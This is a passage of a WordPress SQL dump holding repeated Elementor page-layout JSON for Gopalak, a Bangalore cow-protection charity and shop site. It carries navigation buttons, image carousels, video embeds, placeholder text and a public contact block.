"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":100},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9726,1637,'_elementor_page_assets','a:0:{}'),(9727,1638,'_elementor_edit_mode','builder'),(9728,1638,'_elementor_template_type','wp-page'),(9729,1638,'_elementor_version','3.7.8'),(9730,1638,'_wp_page_template','elementor_canvas'),(9731,1638,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"taiowc-thumb-img\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Values\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1795b3e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#154833\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":100},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9732,1638,'_elementor_page_assets','a:0:{}'),(9733,1639,'_elementor_edit_mode','builder'),(9734,1639,'_elementor_template_type','wp-page'),(9735,1639,'_elementor_version','3.7.8'),(9736,1639,'_wp_page_template','elementor_canvas'),(9737,1639,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"taiowc-thumb-img\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact 